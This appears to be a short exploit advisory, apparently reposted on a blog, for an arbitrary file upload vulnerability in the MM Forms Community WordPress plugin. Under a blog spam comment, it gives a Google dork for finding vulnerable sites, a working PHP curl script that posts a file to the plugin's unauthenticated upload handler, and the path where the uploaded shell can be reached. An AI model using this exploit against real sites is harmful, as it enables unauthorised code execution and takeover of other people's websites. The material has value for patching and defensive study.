##################################################
# Description : Wordpress Plugins - MM Forms Community Arbitrary File
Upload Vulnerability
# Version : 2.2.5 - 2.2.6
# Link : http://wordpress.org/extend/plugins/mm-forms-community/
# Plugins : http://downloads.wordpress.org/plugin/mm-forms-community.zip
# Date : 24-05-2012
# Google Dork : inurl:/wp-content/plugins/mm-forms-community/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################
Exploit :
PostShell.php
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/mm-forms-community/upload/temp/
Filename : $postResult output
lo.php
<?php
phpinfo();
?>
I almost never leave a response, however i did a few
ReplyDeletesearching and wound up here "MM Forms Community Arbitrary File Upload Vulnerability".
And I actually do have some questions for you
if it's allright. Could it be just me or does it look like some of the comments appear like written by brain dead visitors? :-P And, if you are posting at other social sites, I would like to keep up with everything new you have to post. Would you make a list of all of all your shared sites like your twitter feed, Facebook page or linkedin profile?
Here is my webpage: acoustic guitar a chord